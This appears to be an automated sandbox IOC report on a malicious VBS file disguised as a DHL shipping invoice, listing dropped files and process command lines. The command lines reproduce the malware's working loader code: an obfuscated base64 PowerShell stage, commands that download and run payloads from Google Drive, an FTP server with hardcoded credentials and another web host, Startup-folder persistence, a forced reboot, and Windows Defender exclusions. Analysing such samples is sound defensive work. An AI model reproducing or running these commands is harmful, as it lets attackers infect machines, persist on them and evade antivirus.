IOC Report
DHLShippingInvoicesAwbBL000000000102220242247.vbs

loading gif

Files

File Path
Type
Category
Malicious
DHLShippingInvoicesAwbBL000000000102220242247.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1
Unicode text, UTF-16, little-endian text, with very long lines (32626)
dropped
malicious
C:\Users\user\AppData\Roaming\kanspt.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00pvq4sc.t3i.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12lqsw0q.pmk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3el32ich.rk5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uvupvh0.4sq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4m5g3u03.2yg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayycdulq.lif.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcg1l3yk.e0b.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blmkc2b4.ozs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxskrxof.p14.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtxye3lw.u4t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eein2ezk.r4t.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei3rpfot.1yp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmrxwny3.fc5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icg0nb2w.igy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iewb3vnf.q2j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpblppuq.me1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofed4421.la5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okds5wqa.ls0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5sq0hqy.5t1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qf2dwqtk.4qt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkc3pine.ajb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rx4eudy2.xlg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to332dyb.g1m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_toy2s0pu.fv4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ublatxrb.uvt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgqtfn4b.uvu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv4B4.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x6da2561b, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3IW5OZXGDY3NXEI39FD5.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PU3L4BZ4AWSD36U3C1A.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF51e45b.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF52061b.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF522849.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5248d1.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HM2VBND1UF4SDW4A67CK.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZUUCR01O0HLZOS0XNZD.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QZ0948YFXWA39YB1K9IS.temp
data
dropped
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x11.ps1
ASCII text, with very long lines (393), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x22.ps1
ASCII text, with very long lines (397), with no line terminators
dropped
There are 36 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + [char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAcg' + [char]66 + 'kAHoAeQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAcQ' + [char]66 + 'sAHIAcgAkACgAIAA9ACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAKAAgAD0AIA' + [char]66 + 'xAHEAbA' + [char]66 + 'yAHIAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAcQ' + [char]66 + 'sAHIAcgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$hsdzv = $qKKzc; ;$hsdzv = $qKKzc.replace('???' , 'B') ;;$qqbfx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqbfx
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
